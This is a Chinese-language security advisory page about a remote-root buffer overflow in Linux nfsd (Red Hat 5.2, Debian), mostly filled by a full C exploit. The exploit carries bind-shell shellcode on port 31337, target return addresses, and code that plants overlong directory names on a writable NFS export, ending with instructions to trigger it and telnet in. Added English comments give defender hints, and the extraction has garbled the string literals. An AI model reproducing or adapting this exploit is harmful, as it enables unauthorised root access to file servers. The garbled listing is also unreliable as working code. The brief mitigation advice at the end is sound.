
Linux的nfsd存在漏洞,允许入侵者获取root权限

文章类别:C语言程序设计 | 发表日期:2008-9-24 14:38:30

涉及程序:
Debian/Redhat Linux5.2

描述:
Linux的nfsd存在溢出漏洞,允许入侵者远程获取root权限

具体:
如果nfsd服务处于开放状态,并且远程用户对某个导出目录拥有写权限,则他可以远程获取root权限!
以下代码在Linux下编译通过,严禁用于非法用途,否则后果自负!
使用方法参看辰光工作室的 Heavy Security

#include
#include
#include
#include
#include
#include

/*
 * Terminal colour/attribute strings concatenated into the status messages
 * printed by main().
 * NOTE(review): these literals, like the other string and character
 * literals in this listing, look mangled by the page extraction
 * (presumably they were terminal escape sequences). They are kept exactly
 * as they appear on the page.
 */
#define green "E[32m"
#define bold "E[1m"
#define normal "E[m"
#define red "E[31m"


/*
 * Opaque payload bytes. main() overwrites two bytes at offset 66 with the
 * value of port, appends mark (FTP mode only) and next, and then embeds the
 * result in the name of one of the directories it creates.
 * For defenders: the payload therefore ends up on disk as part of a very
 * long directory name containing non-printable bytes, beneath the exported
 * directory. That name is the artefact to look for on a file server.
 */
char shell[255] =
"xebx70x31xc9x31xdbx31xc0xb0x46xcdx80x5ex83xc6x0fx89x46"
"x10x89x46x14x89x46x18xb0x02x89x06x89x46x0cxb0x06x89x46"
"x08x31xc0xfexc3x89x5ex04xb0x66x89xf1xcdx80x89x06xb0x30"
"x31xdbx31xc9xb3x0exfexc1xcdx80x66xb8x69x7ax86xc4x66x89"
"x46x0ex8dx46x0cx89x46x04x31xc0xb0x10x89x46x08xb0x66x31"
"xdbxb3x02x89xf1xcdx80x31xc0xfexc0x89x46x04xb0x66xb3x04"
"x89xf1xcdx80xebx04xebx60xebx8cx89x46x0cx8dx46x0cx89x46"
"x04x89x46x08xc6x46x0cx10x31xc0xb0x66x31xdbxb3x05x89xf1"
"xcdx80x83xeex0fx89xc3x31xc9x89x4ex14xb0x3fxcdx80x41xb0"
"x3fxcdx80x41xb0x3fxcdx80xfex06xfex46x04x88x66x07x88x66"
"x0bx89x76x0cx8dx46x09x89x46x10x31xc0xb0x0bx89xf3x8dx4e"
"x0cx8dx56x10xcdx80x31xdbx89xd8xfexc0xcdx80xe8x9bxffxff";
/* Trailer that main() always appends to shell. */
char next[] = "xffx2ex62x69x6ex2ex73x68x41x41x2dx69";
/* Extra bytes that main() appends to shell only when -f (FTP mode) is used. */
char mark[] = "xffxffxff";

/* Port number written into the payload and printed in the closing message;
 * 31337 unless -s is given. An unexpected listener on this port is a
 * host-level indicator worth checking for. */
int port = 31337;
/* Set in main() to the length of the export path after a trailing slash
 * has been ensured; used to size the fourth directory name. */
int offset;


/*
 * Print the command-line synopsis of this tool to stdout and terminate the
 * process with exit status 0. Does not return.
 *
 * prog: program name substituted into the first line (main() in this
 *       listing passes argv[0]).
 *
 * NOTE(review): the message text is reproduced exactly as it appears on
 * the page, including spelling and the characters left behind by the
 * extraction.
 */
void usage(char *prog) {
    /* Fixed help lines; none of them contains a conversion specifier, so
     * they can be written out verbatim. */
    static const char *const option_lines[] = {
        " -e dir : real-path to exported direectoryn",
        " -t target : target OSn ",
        " 1 - RH 5.2 (default) n 2 - Debian 2.1n",
        " -s port : shell port, default is 31337n",
        " -f dir : ftp-path to exported directoryn",
        " -u : ftp username (default is ftp)n",
        " -p : ftp password (default is ftp@ftp.orgnn",
    };
    size_t line_count = sizeof option_lines / sizeof option_lines[0];
    size_t k;

    printf("nusage: %s <-e dir> [-t target] [-s port] [-f dir] [-u user] [-p pass]nn", prog);
    for (k = 0; k < line_count; k++) {
        fputs(option_lines[k], stdout);
    }
    exit(0);
}


/*
 * Entry point of the proof-of-concept published with this advisory.
 *
 * What the visible code does: it parses the options, then builds a chain of
 * nested directories beneath the exported path given with -e. Without -f it
 * creates them with mkdir(); with -f it only prints FTP commands
 * (USER/PASS/CWD/MKD/quit) to stdout. Each directory name is a filler
 * component of up to 255 bytes. One of the names carries the shell payload
 * and the last one carries the value held in addr. It finishes by printing
 * follow-up instructions to stderr.
 *
 * Defensive relevance: the observable artefact on the file server is a tree
 * of near-maximum-length directory names, six levels deep, under a writable
 * exported directory, with non-printable bytes in one of the names.
 * Auditing writable exports for such trees, and checking for an unexpected
 * listener on the port named in the closing message, are the host-side
 * checks this listing suggests.
 *
 * NOTE(review): as shown on the page the listing is not in a compilable
 * state (for example the empty character constants below). The comments
 * describe only what the visible statements do.
 */
void main(int argc, char **argv) {
int i,j;
int ftp=0;
char user[255]="ftp";
char pass[255]="ftp@ftp.org";
char buf[4096];
char buf2[4096];
char tmp[4096];
char tmp2[4096];
char exp[255] = "!";
char exp2[255]= "!";
char addr[] = "x06xf6xffxffxbf";


// Option parsing. NOTE(review): every strcpy() below copies optarg into a
// fixed-size local buffer without a length check.
while (1) {
i = getopt(argc,argv,"t:e:s:f:u:p:");
if (i == -1) break;
switch (i) {
case 'e': strcpy(exp,optarg); break;
case 's': port = optarg; break;
case 'f': strcpy(exp2,optarg); ftp = 1; break;
case 'u': strcpy(user,optarg); break;
case 'p': strcpy(pass,optarg); break;
case 't': switch (j=atoi(optarg)) {
case 1: strcpy(addr,"x06xf6xffxffxbf");
break; // debian 1.2
case 2: strcpy(addr,"x18xf6xffxffxbf");
break; // rh 5.2
}
default : usage(argv[0]); break;
}
}
// exp still holds its initial marker value when -e was not supplied.
if (!strcmp(exp,"!")) usage(argv[0]);
if (ftp == 1) {
// sockets, resolve, connect......
}
// Store port as a 16-bit value inside the payload buffer at offset 66.
*((unsigned short *) (shell + 66)) = port;

// Make sure the export path ends with a slash; offset is its final length.
offset = strlen(exp);
if (exp[offset-1] != '/') strcat(exp,"/");
offset = strlen(exp);
// 1st directory
// tmp becomes 255 filler bytes followed by a slash; buf starts as the
// export path and accumulates the full nested path.
bzero(buf,sizeof(buf));
memset(tmp,'A',255);
tmp[255]='/';
tmp[256]='';
strncpy(buf,exp,offset);
// make our dirs
// In FTP mode the login and the change into the -f directory are printed
// as protocol commands rather than performed here.
if (ftp == 1) {
printf("USER %sn",user);
printf("PASS %sn",pass);
printf("CWD %sn",exp2);
}
// Three filler levels, each one nested inside the previous one.
for (i=1;i<=3;i++) {
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck! can't create directory!!! : %dn%sn"normal,i,buf);
exit(-1);
}
} else {
tmp[255]='';
printf("MKD %sn",tmp);
printf("CWD %sn",tmp);
}
}
// offset directory, length depends on real-path
// The filler is shortened by offset, the length of the export path.
memset(tmp,'A',255);
tmp[255-offset]='/';
tmp[256-offset]='';
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuqn offset dirW#$#@%#$^%T#n"normal);
exit(-1);
}
} else {
tmp[255-offset]='';
printf("MKD %sn",tmp);
printf("CWD %sn",tmp);
}
// shell directory
// The payload (plus mark in FTP mode, plus next) is copied over the tail of
// a filler name so that it ends at index 255, or 258 in FTP mode.
memset(tmp,'x',255);
// printf("%dn", strlen(shell));
if (ftp == 1) strncat(shell,mark,strlen(mark));
// printf("%dn", strlen(shell));
strncat(shell,next,strlen(next));
if (ftp == 1) i=3; else i=0;
strcpy(tmp+(255+i-strlen(shell)),shell);
// printf("%dn", strlen(shell));
strncat(buf,tmp,strlen(tmp));
strncat(buf,"/",strlen("/"));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@# shell-dirn%sn"normal, buf);
exit(-1);
}
} else {
tmp[258]='';
printf("MKD %sn",tmp);
printf("CWD %sn",tmp);
}
// addr directory
// Final level: filler bytes with the contents of addr copied in at index 93.
memset(tmp,'a',255);
tmp[97] = '';
// *((int*)(tmp+93)) = addr;
// if (ftp != 1) *((int*)(tmp+93)) = 0xbffff606; // debian 2.1
// else {
strcpy(tmp+93,addr);
// }
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@#!@#!$ addrez-dir ^n%sn"normal, buf);
exit(-1);
}
} else {
printf("MKD %sn",tmp);
printf("quitn",tmp);
}
// Status line and operator instructions go to stderr, so in FTP mode stdout
// carries only the generated protocol commands.
fprintf(stderr,normal green"Okn"normal);
fprintf(stderr,"now you have to do: "bold green "rm -rf /path-to-mount-point/A[tab] & n"
"and: telnet target %dnn"normal,port);
}



解决方案:
取消导出目录的写权限,或者干脆关闭nfsd守护进程。以上只是临时缓解措施,根本的解决办法是安装发行版提供的nfsd修复版本。


摘自:永远的 Unix

